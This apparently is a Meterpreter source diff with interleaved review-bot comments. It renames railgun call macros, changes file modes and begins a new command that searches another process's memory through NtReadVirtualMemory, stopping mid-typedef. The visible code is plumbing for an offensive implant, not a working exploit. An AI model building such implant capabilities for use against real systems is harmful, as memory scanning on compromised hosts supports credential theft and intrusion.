diff --git a/c/meterpreter/source/ReflectiveDLLInjection b/c/meterpreter/source/ReflectiveDLLInjection
index fac3adab1..81cde88be 160000
--- a/c/meterpreter/source/ReflectiveDLLInjection
+++ b/c/meterpreter/source/ReflectiveDLLInjection
@@ -1 +1 @@
-Subproject commit fac3adab1187deade60eef27be8423ee117c1e1f
+Subproject commit 81cde88bebaa9fe782391712518903b5923470fb
diff --git a/c/meterpreter/source/common/common_command_ids.h b/c/meterpreter/source/common/common_command_ids.h
old mode 100755
new mode 100644
index f7ee80d66..e9951eecd
--- a/c/meterpreter/source/common/common_command_ids.h
+++ b/c/meterpreter/source/common/common_command_ids.h
@@ -174,6 +174,7 @@
 #define COMMAND_ID_STDAPI_AUDIO_MIC_START 1115
 #define COMMAND_ID_STDAPI_AUDIO_MIC_STOP 1116
 #define COMMAND_ID_STDAPI_AUDIO_MIC_LIST 1117
+#define COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_SEARCH 1119
 #define COMMAND_ID_PRIV_ELEVATE_GETSYSTEM 2001
 #define COMMAND_ID_PRIV_FS_BLANK_DIRECTORY_MACE 2002
 #define COMMAND_ID_PRIV_FS_BLANK_FILE_MACE 2003
diff --git a/c/meterpreter/source/dump_sam/ReflectiveFreeAndExitThread.c b/c/meterpreter/source/dump_sam/ReflectiveFreeAndExitThread.c
old mode 100755
new mode 100644
diff --git a/c/meterpreter/source/dump_sam/ReflectiveFreeAndExitThread.h b/c/meterpreter/source/dump_sam/ReflectiveFreeAndExitThread.h
old mode 100755
new mode 100644
diff --git a/c/meterpreter/source/dump_sam/dump_sam.def b/c/meterpreter/source/dump_sam/dump_sam.def
old mode 100755
new mode 100644
diff --git a/c/meterpreter/source/extensions/extapi/ntds.c b/c/meterpreter/source/extensions/extapi/ntds.c
old mode 100755
new mode 100644
diff --git a/c/meterpreter/source/extensions/peinjector/headers.h b/c/meterpreter/source/extensions/peinjector/headers.h
old mode 100755
new mode 100644
diff --git a/c/meterpreter/source/extensions/peinjector/libpefile.c b/c/meterpreter/source/extensions/peinjector/libpefile.c
old mode 100755
new mode 100644
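Review bot: The new define jumps from 1117 to 1119, leaving 1118 unassigned in the visible block with no indication of why. If 1118 is reserved for an ID allocated in another branch or repository, a one-line comment next to the new define would stop a later contributor from reusing it, e.g. `// 1118 is reserved elsewhere; do not reuse`; if the gap is accidental, 1118 is the next free value. Command IDs are presumably mirrored on the framework side, so whichever value is kept has to match there too.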
diff --git a/c/meterpreter/source/extensions/peinjector/libpefile.h b/c/meterpreter/source/extensions/peinjector/libpefile.h
old mode 100755
new mode 100644
diff --git a/c/meterpreter/source/extensions/peinjector/libpeinfect.c b/c/meterpreter/source/extensions/peinjector/libpeinfect.c
old mode 100755
new mode 100644
diff --git a/c/meterpreter/source/extensions/peinjector/libpeinfect.h b/c/meterpreter/source/extensions/peinjector/libpeinfect.h
old mode 100755
new mode 100644
diff --git a/c/meterpreter/source/extensions/peinjector/libpeinfect_obfuscator.c b/c/meterpreter/source/extensions/peinjector/libpeinfect_obfuscator.c
old mode 100755
new mode 100644
diff --git a/c/meterpreter/source/extensions/peinjector/libpeinfect_obfuscator.h b/c/meterpreter/source/extensions/peinjector/libpeinfect_obfuscator.h
old mode 100755
new mode 100644
diff --git a/c/meterpreter/source/extensions/peinjector/libpetool.c b/c/meterpreter/source/extensions/peinjector/libpetool.c
old mode 100755
new mode 100644
diff --git a/c/meterpreter/source/extensions/peinjector/libpetool.h b/c/meterpreter/source/extensions/peinjector/libpetool.h
old mode 100755
new mode 100644
diff --git a/c/meterpreter/source/extensions/peinjector/peinjector.c b/c/meterpreter/source/extensions/peinjector/peinjector.c
old mode 100755
new mode 100644
diff --git a/c/meterpreter/source/extensions/peinjector/peinjector.h b/c/meterpreter/source/extensions/peinjector/peinjector.h
old mode 100755
new mode 100644
diff --git a/c/meterpreter/source/extensions/peinjector/peinjector_bridge.c b/c/meterpreter/source/extensions/peinjector/peinjector_bridge.c
old mode 100755
new mode 100644
diff --git a/c/meterpreter/source/extensions/peinjector/peinjector_bridge.h b/c/meterpreter/source/extensions/peinjector/peinjector_bridge.h
old mode 100755
new mode 100644
diff --git a/c/meterpreter/source/extensions/powershell/powershell.c b/c/meterpreter/source/extensions/powershell/powershell.c
old mode 100755
new mode 100644
diff --git a/c/meterpreter/source/extensions/powershell/powershell.h b/c/meterpreter/source/extensions/powershell/powershell.h
old mode 100755
new mode 100644
diff --git a/c/meterpreter/source/extensions/powershell/powershell_bindings.cpp b/c/meterpreter/source/extensions/powershell/powershell_bindings.cpp
old mode 100755
new mode 100644
diff --git a/c/meterpreter/source/extensions/powershell/powershell_bindings.h b/c/meterpreter/source/extensions/powershell/powershell_bindings.h
old mode 100755
new mode 100644
diff --git a/c/meterpreter/source/extensions/powershell/powershell_bridge.cpp b/c/meterpreter/source/extensions/powershell/powershell_bridge.cpp
old mode 100755
new mode 100644
diff --git a/c/meterpreter/source/extensions/powershell/powershell_bridge.h b/c/meterpreter/source/extensions/powershell/powershell_bridge.h
old mode 100755
new mode 100644
diff --git a/c/meterpreter/source/extensions/priv/elevate.c b/c/meterpreter/source/extensions/priv/elevate.c
old mode 100755
new mode 100644
diff --git a/c/meterpreter/source/extensions/priv/elevate.h b/c/meterpreter/source/extensions/priv/elevate.h
old mode 100755
new mode 100644
diff --git a/c/meterpreter/source/extensions/priv/namedpipe_efs.c b/c/meterpreter/source/extensions/priv/namedpipe_efs.c
old mode 100755
new mode 100644
diff --git a/c/meterpreter/source/extensions/priv/priv.rc b/c/meterpreter/source/extensions/priv/priv.rc
old mode 100755
new mode 100644
diff --git a/c/meterpreter/source/extensions/priv/resource.h b/c/meterpreter/source/extensions/priv/resource.h
old mode 100755
new mode 100644
diff --git a/c/meterpreter/source/extensions/python/python_commands.c b/c/meterpreter/source/extensions/python/python_commands.c
old mode 100755
new mode 100644
diff --git a/c/meterpreter/source/extensions/python/python_commands.h b/c/meterpreter/source/extensions/python/python_commands.h
old mode 100755
new mode 100644
diff --git a/c/meterpreter/source/extensions/python/python_main.c b/c/meterpreter/source/extensions/python/python_main.c
old mode 100755
new mode 100644
diff --git a/c/meterpreter/source/extensions/python/python_meterpreter_binding.c b/c/meterpreter/source/extensions/python/python_meterpreter_binding.c
old mode 100755
new mode 100644
diff --git a/c/meterpreter/source/extensions/stdapi/server/railgun/railgun.c b/c/meterpreter/source/extensions/stdapi/server/railgun/railgun.c
old mode 100755
new mode 100644
index 879c9c7c6..67c18f186
--- a/c/meterpreter/source/extensions/stdapi/server/railgun/railgun.c
+++ b/c/meterpreter/source/extensions/stdapi/server/railgun/railgun.c
@@ -220,32 +220,32 @@ DWORD railgun_call( RAILGUN_INPUT * pInput, RAILGUN_OUTPUT * pOutput )
 #ifdef _WIN64
 switch( dwStackSizeInElements )
 {
- case 0: pOutput->qwReturnValue = function( 00 )(); break;
- case 1: pOutput->qwReturnValue = function( 01 )( p(0) ); break;
- case 2: pOutput->qwReturnValue = function( 02 )( p(0), p(1) ); break;
- case 3: pOutput->qwReturnValue = function( 03 )( p(0), p(1), p(2) ); break;
- case 4: pOutput->qwReturnValue = function( 04 )( p(0), p(1), p(2), p(3) );break;
- case 5: pOutput->qwReturnValue = function( 05 )( p(0), p(1), p(2), p(3), p(4) );break;
- case 6: pOutput->qwReturnValue = function( 06 )( p(0), p(1), p(2), p(3), p(4), p(5) );break;
- case 7: pOutput->qwReturnValue = function( 07 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6) );break;
- case 8: pOutput->qwReturnValue = function( 08 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7) );break;
- case 9: pOutput->qwReturnValue = function( 09 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8) );break;
- case 10: pOutput->qwReturnValue = function( 10 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9) );break;
- case 11: pOutput->qwReturnValue = function( 11 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10) );break;
- case 12: pOutput->qwReturnValue = function( 12 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11) );break;
- case 13: pOutput->qwReturnValue = function( 13 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12) );break;
- case 14: pOutput->qwReturnValue = function( 14 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13) );break;
- case 15: pOutput->qwReturnValue = function( 15 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14) );break;
- case 16: pOutput->qwReturnValue = function( 16 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15) );break;
- case 17: pOutput->qwReturnValue = function( 17 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16) );break;
- case 18: pOutput->qwReturnValue = function( 18 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17) );break;
- case 19: pOutput->qwReturnValue = function( 19 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17), p(18) );break;
- case 20: pOutput->qwReturnValue = function( 20 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17), p(18), p(19) );break;
- case 21: pOutput->qwReturnValue = function( 21 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17), p(18), p(19), p(20) );break;
- case 22: pOutput->qwReturnValue = function( 22 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17), p(18), p(19), p(20), p(21) );break;
- case 23: pOutput->qwReturnValue = function( 23 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17), p(18), p(19), p(20), p(21), p(22) );break;
- case 24: pOutput->qwReturnValue = function( 24 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17), p(18), p(19), p(20), p(21), p(22), p(23) );break;
- case 25: pOutput->qwReturnValue = function( 25 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17), p(18), p(19), p(20), p(21), p(22), p(23), p(24) );break;
+ case 0: pOutput->qwReturnValue = stdcall_func( 00 )(); break;
+ case 1: pOutput->qwReturnValue = stdcall_func( 01 )( p(0) ); break;
+ case 2: pOutput->qwReturnValue = stdcall_func( 02 )( p(0), p(1) ); break;
+ case 3: pOutput->qwReturnValue = stdcall_func( 03 )( p(0), p(1), p(2) ); break;
+ case 4: pOutput->qwReturnValue = stdcall_func( 04 )( p(0), p(1), p(2), p(3) );break;
+ case 5: pOutput->qwReturnValue = stdcall_func( 05 )( p(0), p(1), p(2), p(3), p(4) );break;
+ case 6: pOutput->qwReturnValue = stdcall_func( 06 )( p(0), p(1), p(2), p(3), p(4), p(5) );break;
+ case 7: pOutput->qwReturnValue = stdcall_func( 07 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6) );break;
+ case 8: pOutput->qwReturnValue = stdcall_func( 08 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7) );break;
+ case 9: pOutput->qwReturnValue = stdcall_func( 09 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8) );break;
+ case 10: pOutput->qwReturnValue = stdcall_func( 10 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9) );break;
+ case 11: pOutput->qwReturnValue = stdcall_func( 11 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10) );break;
+ case 12: pOutput->qwReturnValue = stdcall_func( 12 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11) );break;
+ case 13: pOutput->qwReturnValue = stdcall_func( 13 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12) );break;
+ case 14: pOutput->qwReturnValue = stdcall_func( 14 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13) );break;
+ case 15: pOutput->qwReturnValue = stdcall_func( 15 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14) );break;
+ case 16: pOutput->qwReturnValue = stdcall_func( 16 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15) );break;
+ case 17: pOutput->qwReturnValue = stdcall_func( 17 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16) );break;
+ case 18: pOutput->qwReturnValue = stdcall_func( 18 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17) );break;
+ case 19: pOutput->qwReturnValue = stdcall_func( 19 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17), p(18) );break;
+ case 20: pOutput->qwReturnValue = stdcall_func( 20 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17), p(18), p(19) );break;
+ case 21: pOutput->qwReturnValue = stdcall_func( 21 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17), p(18), p(19), p(20) );break;
+ case 22: pOutput->qwReturnValue = stdcall_func( 22 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17), p(18), p(19), p(20), p(21) );break;
+ case 23: pOutput->qwReturnValue = stdcall_func( 23 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17), p(18), p(19), p(20), p(21), p(22) );break;
+ case 24: pOutput->qwReturnValue = stdcall_func( 24 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17), p(18), p(19), p(20), p(21), p(22), p(23) );break;
+ case 25: pOutput->qwReturnValue = stdcall_func( 25 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17), p(18), p(19), p(20), p(21), p(22), p(23), p(24) );break;
 default:
 dprintf( "[RAILGUN] railgun_call: Can't call function: dwStackSizeInElements (%d) is > 25", dwStackSizeInElements );
@@ -295,32 +295,32 @@ DWORD railgun_call( RAILGUN_INPUT * pInput, RAILGUN_OUTPUT * pOutput )
 } else { // STDCALL
 switch( dwStackSizeInElements )
 {
- case 0: pOutput->qwReturnValue = function( 00 )(); break;
- case 1: pOutput->qwReturnValue = function( 01 )( p(0) ); break;
- case 2: pOutput->qwReturnValue = function( 02 )( p(0), p(1) ); break;
- case 3: pOutput->qwReturnValue = function( 03 )( p(0), p(1), p(2) ); break;
- case 4: pOutput->qwReturnValue = function( 04 )( p(0), p(1), p(2), p(3) );break;
- case 5: pOutput->qwReturnValue = function( 05 )( p(0), p(1), p(2), p(3), p(4) );break;
- case 6: pOutput->qwReturnValue = function( 06 )( p(0), p(1), p(2), p(3), p(4), p(5) );break;
- case 7: pOutput->qwReturnValue = function( 07 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6) );break;
- case 8: pOutput->qwReturnValue = function( 08 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7) );break;
- case 9: pOutput->qwReturnValue = function( 09 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8) );break;
- case 10: pOutput->qwReturnValue = function( 10 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9) );break;
- case 11: pOutput->qwReturnValue = function( 11 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10) );break;
- case 12: pOutput->qwReturnValue = function( 12 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11) );break;
- case 13: pOutput->qwReturnValue = function( 13 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12) );break;
- case 14: pOutput->qwReturnValue = function( 14 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13) );break;
- case 15: pOutput->qwReturnValue = function( 15 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14) );break;
- case 16: pOutput->qwReturnValue = function( 16 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15) );break;
- case 17: pOutput->qwReturnValue = function( 17 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16) );break;
- case 18: pOutput->qwReturnValue = function( 18 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17) );break;
- case 19: pOutput->qwReturnValue = function( 19 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17), p(18) );break;
- case 20: pOutput->qwReturnValue = function( 20 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17), p(18), p(19) );break;
- case 21: pOutput->qwReturnValue = function( 21 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17), p(18), p(19), p(20) );break;
- case 22: pOutput->qwReturnValue = function( 22 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17), p(18), p(19), p(20), p(21) );break;
- case 23: pOutput->qwReturnValue = function( 23 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17), p(18), p(19), p(20), p(21), p(22) );break;
- case 24: pOutput->qwReturnValue = function( 24 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17), p(18), p(19), p(20), p(21), p(22), p(23) );break;
- case 25: pOutput->qwReturnValue = function( 25 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17), p(18), p(19), p(20), p(21), p(22), p(23), p(24) );break;
+ case 0: pOutput->qwReturnValue = stdcall_func( 00 )(); break;
+ case 1: pOutput->qwReturnValue = stdcall_func( 01 )( p(0) ); break;
+ case 2: pOutput->qwReturnValue = stdcall_func( 02 )( p(0), p(1) ); break;
+ case 3: pOutput->qwReturnValue = stdcall_func( 03 )( p(0), p(1), p(2) ); break;
+ case 4: pOutput->qwReturnValue = stdcall_func( 04 )( p(0), p(1), p(2), p(3) );break;
+ case 5: pOutput->qwReturnValue = stdcall_func( 05 )( p(0), p(1), p(2), p(3), p(4) );break;
+ case 6: pOutput->qwReturnValue = stdcall_func( 06 )( p(0), p(1), p(2), p(3), p(4), p(5) );break;
+ case 7: pOutput->qwReturnValue = stdcall_func( 07 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6) );break;
+ case 8: pOutput->qwReturnValue = stdcall_func( 08 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7) );break;
+ case 9: pOutput->qwReturnValue = stdcall_func( 09 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8) );break;
+ case 10: pOutput->qwReturnValue = stdcall_func( 10 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9) );break;
+ case 11: pOutput->qwReturnValue = stdcall_func( 11 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10) );break;
+ case 12: pOutput->qwReturnValue = stdcall_func( 12 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11) );break;
+ case 13: pOutput->qwReturnValue = stdcall_func( 13 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12) );break;
+ case 14: pOutput->qwReturnValue = stdcall_func( 14 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13) );break;
+ case 15: pOutput->qwReturnValue = stdcall_func( 15 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14) );break;
+ case 16: pOutput->qwReturnValue = stdcall_func( 16 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15) );break;
+ case 17: pOutput->qwReturnValue = stdcall_func( 17 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16) );break;
+ case 18: pOutput->qwReturnValue = stdcall_func( 18 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17) );break;
+ case 19: pOutput->qwReturnValue = stdcall_func( 19 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17), p(18) );break;
+ case 20: pOutput->qwReturnValue = stdcall_func( 20 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17), p(18), p(19) );break;
+ case 21: pOutput->qwReturnValue = stdcall_func( 21 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17), p(18), p(19), p(20) );break;
+ case 22: pOutput->qwReturnValue = stdcall_func( 22 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17), p(18), p(19), p(20), p(21) );break;
+ case 23: pOutput->qwReturnValue = stdcall_func( 23 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17), p(18), p(19), p(20), p(21), p(22) );break;
+ case 24: pOutput->qwReturnValue = stdcall_func( 24 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17), p(18), p(19), p(20), p(21), p(22), p(23) );break;
+ case 25: pOutput->qwReturnValue = stdcall_func( 25 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17), p(18), p(19), p(20), p(21), p(22), p(23), p(24) );break;
 default:
 dprintf( "[RAILGUN] railgun_call: Can't call function: dwStackSizeInElements (%d) is > 25", dwStackSizeInElements );
diff --git a/c/meterpreter/source/extensions/stdapi/server/railgun/railgun.h b/c/meterpreter/source/extensions/stdapi/server/railgun/railgun.h
old mode 100644
new mode 100755
index 32a2d0427..6439e7019
--- a/c/meterpreter/source/extensions/stdapi/server/railgun/railgun.h
+++ b/c/meterpreter/source/extensions/stdapi/server/railgun/railgun.h
@@ -47,7 +47,7 @@ typedef struct _RAILGUN_OUTPUT
 } RAILGUN_OUTPUT;
 #define p(i) (ULONG_PTR)pStack[i]
-#define function(i) ((STDCALL_FUNC_##i)pFuncAddr)
+#define stdcall_func(i) ((STDCALL_FUNC_##i)pFuncAddr)
 #define cdecl_func(i) ((CDECL_FUNC_##i)pFuncAddr)
 typedef ULONG_PTR (__stdcall * STDCALL_FUNC_00)( VOID );
diff --git a/c/meterpreter/source/extensions/stdapi/server/stdapi.c b/c/meterpreter/source/extensions/stdapi/server/stdapi.c
old mode 100644
new mode 100755
index cfa15fd8d..c9f54d2d0
--- a/c/meterpreter/source/extensions/stdapi/server/stdapi.c
+++ b/c/meterpreter/source/extensions/stdapi/server/stdapi.c
@@ -69,6 +69,7 @@ Command customCommands[] =
 COMMAND_REQ(COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_PROTECT, request_sys_process_memory_protect),
 COMMAND_REQ(COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_LOCK, request_sys_process_memory_lock),
 COMMAND_REQ(COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_UNLOCK, request_sys_process_memory_unlock),
+ COMMAND_REQ(COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_SEARCH, request_sys_process_memory_search),
 // Thread
 COMMAND_REQ(COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_OPEN, request_sys_process_thread_open),
diff --git a/c/meterpreter/source/extensions/stdapi/server/sys/process/memory.c b/c/meterpreter/source/extensions/stdapi/server/sys/process/memory.c
index 597f5d964..ec404be30 100644
--- a/c/meterpreter/source/extensions/stdapi/server/sys/process/memory.c
+++ b/c/meterpreter/source/extensions/stdapi/server/sys/process/memory.c
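Review bot: The new `COMMAND_REQ` entry references `request_sys_process_memory_search`, but no declaration for it appears anywhere in the visible part of the diff, so it presumably still has to be added to the header stdapi.c already pulls the other `request_sys_process_memory_*` handlers from (or confirmed as already present) for this file to compile. Separately, stdapi.c and railgun.h flip from mode 100644 to 100755 while every other file in the commit goes the other way (100755 to 100644); that looks like an executable bit accidentally picked up from the working tree and should be reverted so the commit is a consistent mode normalisation. The `customCommands[]` array starts and ends outside the hunk.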
@@ -1,5 +1,89 @@
 #include "precomp.h"
 #include "common_metapi.h"
+#include "../tiny-regex-c/re.h"
+
+#ifndef __kernel_entry
+#define __kernel_entry
+#endif
+
+typedef __kernel_entry NTSTATUS(WINAPI* NTQUERYINFORMATIONPROCESS) (HANDLE ProcessHandle, DWORD ProcessInformationClass, LPVOID ProcessInformation, ULONG ProcessInformationLength, PULONG ReturnLength);
+
+typedef SIZE_T(WINAPI* VIRTUALQUERYEX) (HANDLE hProcess, LPCVOID lpAddress, PMEMORY_BASIC_INFORMATION lpBuffer, SIZE_T dwLength);
+
+typedef BOOL(WINAPI* CLOSEHANDLE) (HANDLE hObject);
+
+typedef HANDLE(WINAPI* OPENPROCESS) (DWORD dwDesiredAccess, BOOL bInheritHandle, DWORD dwProcessId);
+
+typedef FARPROC(WINAPI* GETPROCADDRESS) (HMODULE hModule, LPCSTR lpProcName);
+
+// http://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FMemory%20Management%2FVirtual%20Memory%2FNtReadVirtualMemory.html
+// https://ntdoc.m417z.com/ntreadvirtualmemory
+typedef NTSTATUS(NTAPI* NTREADVIRTUALMEMORY) (HANDLE ProcessHandle, LPCVOID BaseAddress, LPVOID Buffer, SIZE_T NumberOfBytesToRead, PSIZE_T NumberOfBytesRead);
+
+// http://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FMemory%20Management%2FVirtual%20Memory%2FMEMORY_INFORMATION_CLASS.html
+typedef enum _MEMORY_INFORMATION_CLASS {
+ MemoryBasicInformation
+} MEMORY_INFORMATION_CLASS, * PMEMORY_INFORMATION_CLASS;
+
+typedef struct _UNICODE_STRING {
+ USHORT Length;
+ USHORT MaximumLength;
+ PWSTR Buffer;
+} UNICODE_STRING;
+typedef UNICODE_STRING* PUNICODE_STRING;
+typedef const UNICODE_STRING* PCUNICODE_STRING;
+
+// https://learn.microsoft.com/en-us/windows/win32/api/ntdef/ns-ntdef-_object_attributes
+typedef struct _OBJECT_ATTRIBUTES {
+ ULONG Length;
+ HANDLE RootDirectory;
+ PUNICODE_STRING ObjectName;
+ ULONG Attributes;
+ PVOID SecurityDescriptor;
+ PVOID SecurityQualityOfService;
+} OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES;
+
+typedef struct _RTL_USER_PROCESS_PARAMETERS {
+ BYTE Reserved1[16];
+ PVOID Reserved2[10];
+ UNICODE_STRING ImagePathName;
+ UNICODE_STRING CommandLine;
+} RTL_USER_PROCESS_PARAMETERS, * PRTL_USER_PROCESS_PARAMETERS;
+
+typedef
+VOID
+(NTAPI* PPS_POST_PROCESS_INIT_ROUTINE) (
+ VOID
+ );
+
+typedef struct _PEB {
+ BYTE Reserved1[2];
+ BYTE BeingDebugged;
+ BYTE Reserved2[1];
+ PVOID Reserved3[2];
+ PPEB_LDR_DATA Ldr;
+ PRTL_USER_PROCESS_PARAMETERS ProcessParameters;
+ BYTE Reserved4[104];
+ PVOID Reserved5[52];
